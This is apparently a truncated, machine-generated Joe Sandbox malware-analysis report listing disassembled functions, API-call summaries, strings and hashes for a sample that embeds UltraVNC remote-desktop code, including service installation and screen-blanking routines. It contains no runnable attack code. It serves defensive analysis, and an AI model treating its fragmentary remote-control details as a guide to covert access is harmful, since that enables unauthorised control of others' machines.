                                                                            • String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
                                                                            • API String ID: 2763862709-1375279643
                                                                            • Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                            • Instruction ID: d37d842cf74ef5a219e8cc0cb603970cefa1153677942d1332c5df368e567729
                                                                            • Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
                                                                            • Instruction Fuzzy Hash: 6A411C25A18A8391FB90DF65B8506B673B1FF8974EF844032DE8EC2764DEBCE1499740
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
                                                                            • String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
                                                                            • API String ID: 3991686958-188493154
                                                                            • Opcode ID: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                                            • Instruction ID: 053fe45c9e6fa8e0c0ae98b231617e1499ed212921fd19465a79577f80e3f695
                                                                            • Opcode Fuzzy Hash: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
                                                                            • Instruction Fuzzy Hash: 36B1AC22B08A8285EB40EF25D8502FD3361EF85B9DF448632DE9E877D6EEB8D545C340
                                                                            APIs
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID:
                                                                            • API String ID: 2853843867-0
                                                                            • Opcode ID: fb07c060e62e59c92e14d8bba56b4331bd8ab4caa6675d378a5f059770ada6bd
                                                                            • Instruction ID: 5a4d4489d1ccc5c78b1a12f549da5a435c5139b566b349c03f0651d95633d7cc
                                                                            • Opcode Fuzzy Hash: fb07c060e62e59c92e14d8bba56b4331bd8ab4caa6675d378a5f059770ada6bd
                                                                            • Instruction Fuzzy Hash: 35E1C232A18A9186EB50DF66E4406AD77B0FB99B8DF005135EF8D83B54DFB8E851CB40
                                                                            APIs
                                                                            Strings
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6C2B96A39
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6C2B969F2
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6C2B969A4
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6C2B96A0B
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6C2B96BB2
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6C2B9695B
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                            • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                            • API String ID: 181403729-1081969236
                                                                            • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                            • Instruction ID: 540f873a87fd3e0965529aa4bdfc1efb21c3a159659c56d0d5fc439b33bf8f9d
                                                                            • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                            • Instruction Fuzzy Hash: 7B614562B1859241EB58DF65D8652B933B0EB5634EF84803AEECEC7791EE7CD15AC300
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
                                                                            • String ID: blackscreen
                                                                            • API String ID: 1419467151-1520931032
                                                                            • Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                            • Instruction ID: c29d6dfae5fcdc854c2b7c842ff9cdb97d933153cc4262ff0b6a7f0772da8350
                                                                            • Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
                                                                            • Instruction Fuzzy Hash: D5815E31E0A78382FB608F15E40067967B0AF96B4EF480576CEDD867A5DFEDE4409714
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$EnterInvalidateRect
                                                                            • String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
                                                                            • API String ID: 3829719269-2763606790
                                                                            • Opcode ID: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
                                                                            • Instruction ID: 9dd2291f5ab408dfb1a1319d4cd7661d129ea38ca41a57c19e396a19e1a2dc41
                                                                            • Opcode Fuzzy Hash: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
                                                                            • Instruction Fuzzy Hash: E1715A36A18A8286E744DF25D4406E933B4FB89B4DF484536DE8E9B398CFB8E545C710
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2B92FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF6C2B93009
                                                                              • Part of subcall function 00007FF6C2B92FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF6C2B93041
                                                                            • OpenSCManagerA.ADVAPI32 ref: 00007FF6C2B92D23
                                                                            • CreateServiceA.ADVAPI32 ref: 00007FF6C2B92DB6
                                                                            • GetLastError.KERNEL32 ref: 00007FF6C2B92DC4
                                                                            • CloseServiceHandle.ADVAPI32 ref: 00007FF6C2B92DFB
                                                                              • Part of subcall function 00007FF6C2B8A040: OpenInputDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A07A
                                                                              • Part of subcall function 00007FF6C2B8A040: GetCurrentThreadId.KERNEL32 ref: 00007FF6C2B8A083
                                                                              • Part of subcall function 00007FF6C2B8A040: GetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A08B
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0A6
                                                                              • Part of subcall function 00007FF6C2B8A040: MessageBoxA.USER32 ref: 00007FF6C2B8A0B7
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0C2
                                                                              • Part of subcall function 00007FF6C2B8A040: CloseDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0CB
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
                                                                            • String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
                                                                            • API String ID: 1695331641-1004021400
                                                                            • Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                                            • Instruction ID: 0c84bb0aaa78f27743903f05891517639b4321667f3d21b4589f0e71c6106fd1
                                                                            • Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                                            • Instruction Fuzzy Hash: 98317A31A08A8282EB509F00A8402B973B0FF4975EF540436DECDC2764DFBCE5A9C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
                                                                            • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                            • API String ID: 1846935786-1174184736
                                                                            • Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                            • Instruction ID: bf161a8c40ec1c0096ca68735bd7cdf7f3edb283a64b202f3508db645db6d6cb
                                                                            • Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                            • Instruction Fuzzy Hash: 49312C25A09A8285EBB0DF21B8547AA73B0FF99749F840136DE8E82795DF7CD009C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                                            • String ID: ($DISPLAY$\background.bmp
                                                                            • API String ID: 3125945695-1422902838
                                                                            • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                            • Instruction ID: e45d0d0188d7167ba1eadeea45a1506d18e0f63189f6ea6904d81ec650f34b60
                                                                            • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                            • Instruction Fuzzy Hash: 7C413135A08B8186E760CF24F8557AA77A0FB99799F401239DEDD83BA4DF7CE0558B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recv$send
                                                                            • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                                            • API String ID: 1963230611-4083095726
                                                                            • Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                            • Instruction ID: b28923d8be2a7036716506f6ac3d097822b64ba3aa83260e49c51644248911bd
                                                                            • Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                            • Instruction Fuzzy Hash: 2FF190A1A0CB8741EA949F21A5402B966A1FF8679EF540532DF8DC3B95EFBCF506C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 2183313154-4022980321
                                                                            • Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                            • Instruction ID: caf9dfac0f5da0ef90a5d8e86bb4cefe5c072ef1af112fd0ba91d1c3a4fd9df3
                                                                            • Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                            • Instruction Fuzzy Hash: 2251C325B1868241F7A4DF25A8126BB63B1BF8578AF444135EFCD83B85CFBCE506C605
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                                            • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                                            • API String ID: 771632046-3493897170
                                                                            • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                            • Instruction ID: ec6a3950550d732b831c4ed5f4cda8366f8d1b7c7c5d1158dd9641f4ee1c25ca
                                                                            • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                            • Instruction Fuzzy Hash: B1311036A18A86C2EAA0CF20E4557AA73B0FB8574DF801135EBCD86758DFBDD109CB40
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                                            • String ID:
                                                                            • API String ID: 2532449802-0
                                                                            • Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                            • Instruction ID: 044f8bfcff3e0d63f3504d5ecd65efa6e91224e39d4def75759ac96f3ed0a66d
                                                                            • Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                            • Instruction Fuzzy Hash: 73C1AF32A0C28285EBA49F25A4417BA77B5BF8578AF404535DFCD837A6DFBCE8118700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 429868813-3977938048
                                                                            • Opcode ID: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                                            • Instruction ID: 51da60cf9808415785081d148cce1a428d3950c032456d952c722b13280d7741
                                                                            • Opcode Fuzzy Hash: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                                            • Instruction Fuzzy Hash: CAC1BE22A0869185F794CF25C4587BE7BB1EB86B8EF184031DE8C877A5CFB9D445C740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateRect$CombineDeleteObjectfree$malloc
                                                                            • String ID:
                                                                            • API String ID: 4067307076-0
                                                                            • Opcode ID: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                                            • Instruction ID: e6f1f5b5f798c42016305e52801c5663dc51d07d0901646ab69f3a81abe231a3
                                                                            • Opcode Fuzzy Hash: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                                            • Instruction Fuzzy Hash: A8228E726186818BD764CF25E4402AEBBA1F799B89F044135EE8E87B58DF7CE951CF00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: State$CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 1138030011-0
                                                                            • Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                            • Instruction ID: 5d4fffffc5babeaa6f1dd212fc48fee0cab2e045912b6fc3af49bfcdd805398b
                                                                            • Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                            • Instruction Fuzzy Hash: 4C41A465A1865282F651AF21A50433A66B1FF9135FF050434EECD837A0CFBDE895E360
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DesktopOpen$ClipboardCloseInput
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 2872304593-3977938048
                                                                            • Opcode ID: 51bfd8cfb38b1ed9c7bc9b47d0c5e6e89efe1868c0e2a08d2aedafe3f1771537
                                                                            • Instruction ID: d24f6cd14e7b336f1b83c3f467e8e72771b80d4ff3670342b7e8c929e6d66dc9
                                                                            • Opcode Fuzzy Hash: 51bfd8cfb38b1ed9c7bc9b47d0c5e6e89efe1868c0e2a08d2aedafe3f1771537
                                                                            • Instruction Fuzzy Hash: 9012A032A086C285FBA0CF25C8587FE77A1EB86B8EF544135DE8D8B795CEA8D545C340
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Version$AddressHandleInfoModuleProcSystem
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 335284197-192647395
                                                                            • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                            • Instruction ID: 1a0e5c41c0e2de94e89e4f3b3ae8750164c7353a9a1e7cd7afd87e537f84cc6a
                                                                            • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                            • Instruction Fuzzy Hash: 5131D821A0CA8286EAA0EF51A4553BA73B0FB9574DF804435EACDC3B95EFADD4558B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                                            • String ID: UseRegistry$admin$admin_auth
                                                                            • API String ID: 3374479654-3376419731
                                                                            • Opcode ID: d388acf6b38bd496d9c85bc5d0d74c3b57a82cc440bcd5f7a364d2f7207814f4
                                                                            • Instruction ID: 06fa0be96d015caeed76cc3cc03df64ede38151cacacee64c36ad86554153335
                                                                            • Opcode Fuzzy Hash: d388acf6b38bd496d9c85bc5d0d74c3b57a82cc440bcd5f7a364d2f7207814f4
                                                                            • Instruction Fuzzy Hash: 9C312136618A8291EA90CF11E8447EAB3A4FB8978AF441136EECD87B58DF7CD545CB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                            • String ID:
                                                                            • API String ID: 3778485334-0
                                                                            • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                            • Instruction ID: 8587ec692964547fb05665ca0194b2d3abc80e60a0e77b37a3afbe76658853c4
                                                                            • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                            • Instruction Fuzzy Hash: C631B035908B4285EB90AF54E8413AA73B0FB8879AF504136DFCE827A5DFBCE054C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
